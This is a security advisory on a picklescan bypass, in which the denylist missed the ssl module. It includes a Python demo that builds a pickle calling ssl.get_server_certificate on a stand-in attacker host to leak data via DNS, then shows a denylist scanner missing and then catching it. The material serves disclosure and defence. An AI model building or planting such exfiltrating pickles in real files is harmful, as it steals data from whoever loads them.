
PYSEC-2025-34

Details

Picklescan flags dangerous pickles by walking the pickle's opcodes and matching every global it imports (GLOBAL / STACK_GLOBAL) against a denylist of unsafe modules and callables. Before 0.0.25 that denylist did not include the ssl module, so a pickle whose REDUCE step calls ssl.get_server_certificate scanned as clean. When such a pickle is deserialized, the call opens a connection to the attacker-chosen host and port; resolving that hostname alone sends a DNS query for an attacker-controlled name, so data encoded in the hostname labels reaches the attacker's nameserver even where outbound TCP is blocked. Version 0.0.25 adds ssl to the unsafe globals. As with any denylist scanner, a clean result is not proof that a pickle is safe: treat pickles from untrusted sources as untrusted code and prefer serialization formats that do not execute on load.
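The following added example (not picklescan's code, and not the advisory's) shows the gap statically: it builds a pickle whose REDUCE step names ssl.get_server_certificate, lists the globals that pickle would import by walking its opcodes with pickletools, and runs a minimal denylist scanner over it twice, once with an illustrative denylist that lacks "ssl" and once with "ssl" added. The denylists, the Exfil class and the hostname secret-data.attacker.example are constructed for the demonstration; nothing here ever unpickles the bytes, so no DNS query or connection is made.

```python
import pickle
import pickletools
import ssl  # referenced only so the payload can name ssl.get_server_certificate


class Exfil:
    """Constructed payload: on unpickling, the REDUCE step calls
    ssl.get_server_certificate((host, 443)). Resolving the host sends a DNS
    query for an attacker-controlled name, so data packed into the hostname
    labels leaves the machine even if the TCP connection itself is blocked."""

    def __init__(self, host):
        self.host = host

    def __reduce__(self):
        return (ssl.get_server_certificate, ((self.host, 443),))


def build_payload(host="secret-data.attacker.example", protocol=4):
    """Serialise the payload. pickle.dumps only records the call to make;
    this file never calls pickle.loads, so no network activity occurs."""
    return pickle.dumps(Exfil(host), protocol=protocol)


def extract_globals(data):
    """List the (module, name) pairs the pickle would import, by walking its
    opcodes with pickletools. This is how a static scanner looks at a pickle:
    it inspects the opcode stream and never executes it."""
    found = []
    recent_strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":  # protocols 0-3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":  # protocol 4+: two strings pushed first
            found.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


# Illustrative module denylists (assumption: not picklescan's actual tables).
# The first lacks "ssl", as picklescan's list did before 0.0.25; the second adds it.
UNSAFE_MODULES_OLD = {"os", "subprocess", "sys", "builtins", "socket", "pip"}
UNSAFE_MODULES_FIXED = UNSAFE_MODULES_OLD | {"ssl"}


def scan(data, unsafe_modules):
    """Return the globals a denylist scanner would flag. An empty result is
    what the scanner reports as 'safe'."""
    return [(m, n) for m, n in extract_globals(data) if m in unsafe_modules]


if __name__ == "__main__":
    payload = build_payload()
    print("globals imported by the pickle:", extract_globals(payload))
    print("flagged by the old denylist:   ", scan(payload, UNSAFE_MODULES_OLD))
    print("flagged by the fixed denylist: ", scan(payload, UNSAFE_MODULES_FIXED))
```

The old denylist returns nothing for this payload, which is exactly the failure mode described above: the scanner sees the ssl global, but has no rule for it. The fixed denylist flags it. The same walk works for protocol 2 pickles, where the global arrives as a single GLOBAL opcode rather than STACK_GLOBAL.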


Affected packages

PyPI / picklescan
Introduced in: 0
Fixed in: 0.0.25
Fix: pip install --upgrade 'picklescan>=0.0.25'
